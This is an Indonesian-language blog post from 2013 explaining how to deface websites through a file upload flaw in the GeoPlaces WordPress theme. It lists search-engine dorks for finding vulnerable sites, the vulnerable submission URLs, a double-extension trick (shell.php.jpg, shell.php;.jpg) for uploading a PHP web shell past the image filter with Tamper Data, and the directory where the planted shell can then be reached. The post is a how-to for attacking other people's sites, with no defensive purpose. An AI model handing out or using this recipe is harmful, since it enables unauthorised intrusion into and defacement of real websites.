Wednesday, 20 February 2013

Cara Deface Dengan Shell upload vulnerability

Langsung saja ;) 
 
Dork    :
inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)"
 

Site::
- http://site.com/?ptype=post_listing
- http://
site.com/?ptype=post_event
- http://
site.com/path/?ptype=post_listing
- http://
site.com/path/?ptype=post_event
 
Sebelumnya Rename dulu Shellmu jadi ext. jpg
cth: shell.php.jpg / shell.php;.jpg
Upload shellmu,, gunakan tamper data.  Silahkan Lihat Cara Tamper Data (Upload PHP File) 
 
 
Hasilnya bisa dilihat
- http://
site.com/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
- http://
site.com/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
 
Video Tutorial 
  
  

No comments:

Post a Comment